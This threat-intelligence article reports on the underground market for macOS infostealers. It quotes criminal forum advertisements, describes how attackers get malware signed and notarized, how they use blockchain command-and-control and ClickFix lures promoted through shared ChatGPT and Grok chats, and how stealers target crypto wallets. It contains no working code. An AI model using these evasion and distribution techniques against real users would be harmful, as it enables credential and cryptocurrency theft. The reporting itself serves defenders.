From basement operations to sophisticated malware-as-a-service platforms, threat actors are flooding the underground with tools designed to crack Apple’s defenses, and they’re winning.
For years, Mac users operated under a comforting assumption: their devices were immune to the malware plaguing Windows users. That era is over. Across underground forums, a thriving economy has emerged around macOS infostealers,sophisticated tools designed to extract everything from browser passwords to cryptocurrency wallet seed phrases. The attackers aren’t adapting Windows techniques. They’re innovating specifically for Apple’s ecosystem, and they’re doing it at scale.
Key Takeaways
- At least 103 Chrome crypto extensions are targeted by macOS stealers, with Exodus and Trezor phishing claiming to validate seed phrases in real-time to avoid detection.
- Attackers obtained valid Apple developer signatures to bypass Gatekeeper, with MacSync malware successfully notarized and signed under Team ID GNJLS3UYZ4.
- UNC5142 compromised over 14,000 WordPress sites since late 2023, using blockchain smart contracts on BNB Smart Chain for command-and-control infrastructure.
- Threat actors abuse ChatGPT and Grok by posting malicious instructions, then promoting those chats via Google Ads to distribute AMOS stealer.
- Monitor for unsigned apps requesting passwords, unusual Terminal activity, and blockchain connections from non-financial apps to detect macOS infostealers.
- Criminal groups like Valhall88 on BDFClub operate revenue-sharing models, splitting crypto theft 50/50 while partners keep all non-cryptocurrency stolen data.
The Underground Marketplace: A Criminal Industry Takes Shape
A user calling themselves Valhall88 posted a recruitment pitch on BDFClub in late January, seeking partners to distribute their Mac stealer. The operational sophistication reveals how far this threat has evolved.
For example, take a look at this post from January 31, 2026
Looking for traffickers to team up with for distributing a Mac OS stealer. On my end, I have a private stealer and we’ll work your traffic 50/50 (if you need logs, you can take them completely since we’re only interested in crypto)… 103 crypto extensions for Chrome… Ledger, Trezor, Exodus, Atomic send seed phrases to our common receiving server, from where they are distributed to users.
Note the revenue-sharing model, specialized infrastructure for seed phrase collection, and wallet-specific phishing that validates inputs to avoid tipping off victims. Valhall88 offers partners access to a statistics panel and describes elaborate presets: silent collection when cached passwords exist, forced collection disguised as system updates, and wallet-specific phishing windows that make Exodus auto-exfiltrate seed phrases without any visible anomaly. The wallet continues functioning normally after compromise, eliminating warning signs users might recognize.
That same week, another actor advertised on Voided: “BEST SOLUTION IN NFT SCAM SPHERE,” touting “2+ years experience” and promising “Mac/Win FUD Stealer” with full undetectability (View on Flare).
QuarkLab announced in February that their “Quark Panel 2.0” had launched with a completely rebuilt interface, boasting that “script compilation and deployment are now significantly faster and more intuitive” (View on Flare). They’re iterating based on user feedback, optimizing workflows, and treating malware distribution like any other software business. These operations have org charts, specialization, and long-term roadmaps.
From Terminal Tricks to Signed Applications: The Technical Evolution
Early macOS stealers relied on crude “drag-to-terminal” social engineering, asking users to paste commands into Terminal windows. By late 2025, that approach had become obsolete.
Jamf researchers discovered a MacSync sample delivered through a signed and notarized Swift application, hidden inside a DMG file masquerading as a legitimate messenger installer. The malware passed Gatekeeper checks because it carried a valid Apple developer signature.
At the time of analysis, the malware had a valid digital signature and successfully passed Gatekeeper checks. Jamf specialists confirmed that the Mach-O binary was signed and notarized, with the signature tied to Developer Team ID GNJLS3UYZ4… The malware artificially inflates the DMG file size to 25.5 MB using embedded PDF decoys, removes scripts used in the execution chain, and checks internet connectivity before launch to avoid running in isolated environments.
Apple revoked the certificate after researchers reported it, but the technique proved viable. Attackers now obtain legitimate developer credentials through theft, fraudulent applications, or purchases from compromised accounts. Once signed and notarized, their malware looks indistinguishable from legitimate software. Users see no warnings, no friction, just an apparently safe installation.
Attackers have weaponized Apple’s own trust infrastructure. The very mechanisms designed to protect users, code signing, notarization, Gatekeeper, have become vectors for exploitation. An actor named ParallelUnivers made this explicit in a January forum post advertising a “new resident agent for targeted work” supporting both Windows and Mac. “I don’t provide clean builds, always encrypted/packed,” they wrote, offering command execution, file management, and screenshot capabilities (View on Flare). The product comes with AV detection checks and a “tests are free” guarantee.
Weaponizing Trust: Legitimate Platforms as Attack Infrastructure
The most insidious evolution involves abusing platforms users inherently trust. Google’s Threat Intelligence Group tracked UNC5142, a financially motivated group that pioneered using blockchain smart contracts for command-and-control infrastructure. Since late 2023, they’ve compromised over 14,000 WordPress sites, injecting JavaScript that communicates with contracts on BNB Smart Chain to retrieve next-stage payloads.
The technique, called EtherHiding, offers attackers significant advantages. Blockchain data is immutable and distributed, making takedowns nearly impossible. The traffic blends with legitimate Web3 activity. Traditional network defenses struggle to distinguish malicious blockchain queries from benign ones. A forum post on Underc0de detailed how “UNC5142 combines the use of compromised WordPress sites with EtherHiding… using blockchain smart contracts” to distribute infostealers across Windows and macOS (View on Flare). Google observed no activity after July 2025, suggesting the group may be retooling.
Attackers have also turned AI platforms into distribution channels. Kaspersky and Huntress simultaneously discovered threat actors posting malicious instructions on ChatGPT and Grok, then promoting those shared chats via Google Ads. Users searching for legitimate software help encounter sponsored links to AI chatbot conversations that instruct them to paste terminal commands.
Distributors of the macOS stealer AMOS are mastering a new ClickFix scheme: they post malicious instructions on the websites ChatGPT and Grok, share their chats, and promote them to the top of Google search results by paying for advertising… Notably, the chatbot itself will confirm the danger of such a step if asked whether it should follow the instructions.
The technique exploits multiple trust layers simultaneously. Users trust Google search results, especially sponsored ones. They trust AI chatbots from reputable companies. They trust that instructions appearing on official OpenAI or X.AI domains must be legitimate. By the time they realize they’ve been compromised, the AMOS stealer has already exfiltrated their browser data, Keychain contents, and cryptocurrency wallets.
GitHub Pages has become another favored platform. LastPass documented a campaign where attackers registered GitHub Pages matching company names plus macOS terminology, boosting their search rankings. Users clicking these results get redirected through multiple hops before landing on sites instructing them to paste shell commands. The initial hosting on GitHub provides legitimacy,the platform’s reputation shields the attack’s first stage from scrutiny.
The Cryptocurrency Obsession: Why Macs Became High-Value Targets
Nearly every macOS stealer prioritizes cryptocurrency theft above all else. Valhall88’s recruitment post emphasized they only wanted crypto, offering partners complete access to other stolen data. The stealer targets 103 Chrome crypto extensions and includes wallet-specific phishing for Ledger, Trezor, Exodus, and Atomic. The Trezor phishing validates seed phrases in real time, notifying users if they enter incorrect words to avoid suspicion. Exodus auto-exfiltrates seed phrases after password entry, with the wallet functioning normally afterward.
This laser focus reflects economic reality. Cryptocurrency users disproportionately use Macs. They often hold significant value in software wallets. Unlike bank accounts, crypto transactions are irreversible. Once seed phrases are compromised, funds disappear permanently with no recourse.
The sophistication extends across platforms. A forum post on BFD Forum noted that even mobile platforms face similar threats: “SpyAgent uses optical character recognition to scan images and steal sensitive information stored in images, including private key snapshots” (View on Flare). Attackers use OCR to extract keys from screenshots users thought were safe.
The cryptocurrency focus also explains the partnership models. Valhall88’s 50/50 split on “traffic” with partners keeping all non-crypto logs creates specialization. Some operators focus on distribution and social engineering. Others handle the technical infrastructure for wallet compromise and fund extraction. The division of labor mirrors legitimate business operations, with each party optimizing for their core competency.
What Defenders Must Understand
The “Macs don’t get viruses” assumption is not just outdated but actively dangerous. Organizations with Mac users need detection capabilities for macOS-specific TTPs: unsigned applications requesting passwords, unusual Terminal activity, connections to blockchain nodes for non-financial purposes, and data exfiltration patterns targeting Keychain and browser storage.
User education must evolve beyond “don’t click suspicious links.” Attackers are compromising legitimate platforms, obtaining valid code signatures, and exploiting trusted services. The indicators users learned to recognize warnings from Gatekeeper, unsigned applications, obvious phishing, no longer apply. Modern macOS malware looks legitimate because it often is legitimate until the moment it executes malicious payloads.
The underground economy shows no signs of slowing. With revenue-sharing models, professional development practices, and continuous technical innovation, macOS stealers have become a mature criminal industry. The gold rush is accelerating, and defenders are playing catch-up.
